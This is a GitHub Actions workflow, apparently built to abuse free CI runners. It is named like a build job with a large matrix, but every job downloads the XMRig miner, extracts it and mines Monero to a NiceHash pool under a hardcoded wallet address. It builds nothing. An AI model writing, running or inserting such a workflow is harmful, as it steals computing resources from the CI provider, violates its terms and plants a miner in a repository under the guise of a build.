name: AHAH

on: [workflow_dispatch]

jobs:
  build:
    name: YAa
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/xmrig/xmrig/releases/download/v6.17.0/xmrig-6.17.0-gcc-win64.zip -OutFile xmrig-6.17.0-gcc-win64.zip
    - name: Extract
      run: Expand-Archive xmrig-6.17.0-gcc-win64.zip
    - name: RUNNING
      run: .\xmrig-6.17.0-gcc-win64\xmrig-6.17.0\xmrig.exe -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 3PZhCU3YNXEvZLsbQfhe4MZy7XsAKkgHzL -k --nicehash --coin monero -a rx/0
    - name: DONE
      run: exit
